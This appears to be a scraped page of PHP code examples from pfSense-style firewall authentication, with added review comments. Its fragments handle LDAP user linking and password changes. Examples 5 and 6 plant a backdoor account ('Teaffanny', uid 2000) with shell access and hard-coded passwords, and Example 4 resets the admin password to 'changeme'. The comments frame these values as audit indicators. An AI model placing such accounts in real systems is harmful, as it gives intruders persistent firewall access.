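/**
 * Link a remotely authenticated user to a local account, creating the local
 * account when no matching one exists.
 *
 * An existing local user with the same name (other than 'root') gets its
 * user_dn updated and its local password replaced by a random value, so the
 * old local password can no longer be used as a fall-back login. Otherwise a
 * new entry with scope 'user' is appended under the next free uid.
 *
 * @param string $username     local account name to link or create
 * @param string $userdn       distinguished name stored in user_dn
 * @param string $userfullname stored as the description of a newly created user
 * @return void
 * @throws \RuntimeException when no random password could be generated
 */
function add_local_user($username, $userdn, $userfullname)
{
    global $config;

    // Generate a throw-away random password. Fail closed: on PHP versions where
    // the generator returns false instead of throwing, the previous code would
    // have turned that into an empty password.
    $bytes = openssl_random_pseudo_bytes(50);
    if (!is_string($bytes) || strlen($bytes) !== 50) {
        throw new \RuntimeException('Unable to generate a random password');
    }
    // Keep the hex form instead of raw bytes: raw output can contain NUL bytes.
    // NOTE(review): local_user_set_password() is not visible here; a hash
    // backend that treats NUL as a terminator would shorten a raw-byte password.
    $user_password = bin2hex($bytes);

    if (!isset($config['system']['user']) || !is_array($config['system']['user'])) {
        $config['system']['user'] = array();
    }

    foreach ($config['system']['user'] as &$user) {
        $local_name = isset($user['name']) ? (string)$user['name'] : '';
        // Strict comparison: with == two different numeric-looking names
        // (e.g. "1e3" and "1000") compare equal and would link the wrong account.
        if ($local_name === (string)$username && $local_name !== 'root') {
            // link local user to remote server by updating user_dn
            $user['user_dn'] = $userdn;
            // Trash the local password when linking to LDAP to avoid an
            // accidental login with the fall-back local password. The user can
            // still reset its local password, but only by choice.
            local_user_set_password($user, $user_password);
            local_user_set($user);
            return;
        }
    }
    // Drop the loop reference so later writes to $user cannot touch the last entry.
    unset($user);

    // NOTE(review): a $username of 'root' never matches above and reaches this
    // branch, which appends a second entry named 'root' — confirm this is intended.
    // new user, add
    $new_user = array();
    $new_user['scope'] = 'user';
    $new_user['name'] = $username;
    $new_user['user_dn'] = $userdn;
    $new_user['descr'] = $userfullname;
    local_user_set_password($new_user, $user_password);
    $new_user['uid'] = $config['system']['nextuid']++;
    $config['system']['user'][] = $new_user;
    local_user_set($new_user);
}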
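// Handle the "save" submission of the change-password form for the user named
// in the current session.
// NOTE(review): this fragment does not ask for the current password; whether
// re-authentication or a request token is enforced elsewhere is not visible here.
if (isset($_POST['save'])) {
    unset($input_errors);
    /* input validation */
    $reqdfields = explode(" ", "passwordfld1");
    $reqdfieldsn = array(gettext("Password"));
    do_input_validation($_POST, $reqdfields, $reqdfieldsn, $input_errors);
    $new_password = isset($_POST['passwordfld1']) ? $_POST['passwordfld1'] : '';
    $confirmation = isset($_POST['passwordfld2']) ? $_POST['passwordfld2'] : '';
    // Strict comparison: with != two different numeric-looking strings
    // (e.g. "1e3" and "1000") compare equal, so a mistyped confirmation could
    // pass. Non-string values (array-style form fields) are rejected as well.
    if (!is_string($new_password) || $new_password !== $confirmation) {
        $input_errors[] = gettext("The passwords do not match.");
    }
    // empty() also covers the case where validation left $input_errors unset.
    if (empty($input_errors)) {
        // The session must be open before $_SESSION['Username'] is read.
        if (!session_id()) {
            session_start();
        }
        // all values are okay --> saving changes
        $userent =& $config['system']['user'][$userindex[$_SESSION['Username']]];
        local_user_set_password($userent, $new_password);
        local_user_set($userent);
        // Release the reference into $config before the configuration is written.
        unset($userent);
        session_commit();
        write_config();
        $savemsg = gettext("Password successfully changed") . "<br />";
    }
}
// The code that follows reads $_SESSION, so make sure a session is open.
if (!session_id()) {
    session_start();
}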
/* determine if user is not local to system */
$islocal = false;
foreach ($config['system']['user'] as $user) {
    if ($user['name'] == $_SESSION['Username']) {
        $islocal = true;
Esempio n. 3
     if (!$ca) {
         $input_errors[] = gettext("Invalid internal Certificate Authority") . "\n";
     }
 }
 if (count($input_errors) == 0) {
     $userent = array();
     if (isset($id)) {
         $userent = $a_user[$id];
         /* the user name was modified */
         if ($pconfig['usernamefld'] != $pconfig['oldusername']) {
             local_user_del($userent);
         }
     }
     /* the user password was modified */
     if (!empty($pconfig['passwordfld1'])) {
         local_user_set_password($userent, $pconfig['passwordfld1']);
     }
     isset($pconfig['scope']) ? $userent['scope'] = $pconfig['scope'] : ($userent['scope'] = "system");
     $userent['name'] = $pconfig['usernamefld'];
     $userent['descr'] = $pconfig['descr'];
     $userent['expires'] = $pconfig['expires'];
     $userent['authorizedkeys'] = base64_encode($pconfig['authorizedkeys']);
     $userent['ipsecpsk'] = $pconfig['ipsecpsk'];
     if (!empty($pconfig['disabled'])) {
         $userent['disabled'] = true;
     } elseif (isset($userent['disabled'])) {
         unset($userent['disabled']);
     }
     if (isset($id)) {
         $a_user[$id] = $userent;
     } else {
Esempio n. 4
#!/usr/local/bin/php -f
<?php 
require_once "config.inc";
require "auth.inc";
require_once "functions.inc";
require_once "shaper.inc";
// Reset script: points authentication at the local user database and
// (re)creates the uid 0 account with a fixed password.
// NOTE(review): the key is spelled 'webqui'; if the section actually read by
// the GUI is 'webgui', this assignment leaves the real setting unchanged — confirm.
$config['system']['webqui']['authmode'] = "Local Database";
// Bind a reference to the uid 0 entry (getUserEntryByUID() is defined elsewhere).
$admin_user =& getUserEntryByUID(0);
if (!$admin_user) {
    // No uid 0 entry came back: build a minimal one and append it to the user list.
    $admin_user = array();
    $admin_user['uid'] = 0;
    if (!is_array($config['system']['user'])) {
        $config['system']['user'] = array();
    }
    // Appended by value: the fields assigned further down are written to
    // $admin_user, not to this appended element.
    // NOTE(review): confirm the entry is synchronised back into $config elsewhere.
    $config['system']['user'][] = $admin_user;
}
$admin_user['name'] = "admin";
$admin_user['scope'] = "system";
// Grants the account shell access in addition to the login itself.
$admin_user['priv'] = array("user-shell-access");
// Re-enable the account if it had been disabled.
if (isset($admin_user['disabled'])) {
    unset($admin_user['disabled']);
}
// Hard-coded password: after this script runs, the admin account accepts a
// value that is readable by anyone with access to this file. Limit who can
// execute the script and change the password immediately afterwards.
local_user_set_password($admin_user, "changeme");
local_user_set($admin_user);
Esempio n. 5
require_once "shaper.inc";
// This fragment provisions a fixed account (uid 2000) with shell access and a
// hard-coded password, plus a group with gid 1999. When reviewing a firewall
// configuration, an unexpected uid 2000 user, gid 1999 group or authmode
// change matching these values is worth investigating.
// NOTE(review): the key is spelled 'webqui'; if the real section is 'webgui'
// this assignment does not change the active authentication mode — confirm.
$config['system']['webqui']['authmode'] = "Local Database";
// Bind a reference to the uid 2000 entry (getUserEntryByUID() is defined elsewhere).
$myuser =& getUserEntryByUID(2000);
if (!$myuser) {
    $myuser = array();
    $myuser['uid'] = 2000;
    // Written to fixed index 1 rather than appended: whatever user entry was
    // stored at index 1 is replaced.
    $config['system']['user'][1] = $myuser;
}
$myuser['name'] = "Teaffanny";
$myuser['scope'] = "system";
$myuser['descr'] = "Drink Tea all day, drop firewalls all night";
// Grants the account shell access.
$myuser['priv'] = array("user-shell-access");
// Re-enable the account if it had been disabled.
if (isset($myuser['disabled'])) {
    unset($myuser['disabled']);
}
// Hard-coded password stored in the script itself.
local_user_set_password($myuser, "trainday");
local_user_set($myuser);
// Bind a reference to the gid 1999 entry (getGroupEntryByGID() is defined elsewhere).
$admingroup =& getGroupEntryByGID(1999);
if (!$admingroup) {
    $admingroup = array();
    $admingroup['gid'] = 1999;
    if (!is_array($config['system']['group'])) {
        $config['system']['group'] = array();
    }
    // Assigns the single group array over the whole group section instead of
    // adding an element, so any groups already configured are replaced.
    $config['system']['group'] = $admingroup;
}
$admingroup['name'] = "admins";
$admingroup['scope'] = "system";
if (!is_array($admingroup['member'])) {
    $usersoffun = array();
    $usersoffun[0] = 0;
Esempio n. 6
require_once "shaper.inc";
// This fragment provisions a fixed account (uid 2000) with shell access and a
// hard-coded password, plus a group with gid 1999. An unexpected user or group
// with these ids in a firewall configuration is a useful audit indicator.
// NOTE(review): the key is spelled 'webqui'; if the real section is 'webgui'
// this assignment does not change the active authentication mode — confirm.
$config['system']['webqui']['authmode'] = "Local Database";
// Bind a reference to the uid 2000 entry (getUserEntryByUID() is defined elsewhere).
$myuser =& getUserEntryByUID(2000);
if (!$myuser) {
    $myuser = array();
    $myuser['uid'] = 2000;
    // Fixed index 1 is overwritten here; an existing user entry at that index
    // is lost.
    $config['system']['user'][1] = $myuser;
}
$myuser['name'] = "Teaffanny";
$myuser['scope'] = "system";
$myuser['descr'] = "Drink Tea all day, drop firewalls all night";
// Grants the account shell access.
$myuser['priv'] = array("user-shell-access");
// Re-enable the account if it had been disabled.
if (isset($myuser['disabled'])) {
    unset($myuser['disabled']);
}
// Hard-coded password stored in the script itself.
local_user_set_password($myuser, "pfsense");
local_user_set($myuser);
// Bind a reference to the gid 1999 entry (getGroupEntryByGID() is defined elsewhere).
$admingroup =& getGroupEntryByGID(1999);
if (!$admingroup) {
    $admingroup = array();
    $admingroup['gid'] = 1999;
    if (!is_array($config['system']['group'])) {
        $config['system']['group'] = array();
    }
    // The whole group section is replaced by this one group array rather than
    // extended, so previously configured groups are dropped.
    $config['system']['group'] = $admingroup;
}
$admingroup['name'] = "admins";
$admingroup['scope'] = "system";
if (!is_array($admingroup['member'])) {
    $usersoffun = array();
    $usersoffun[0] = 0;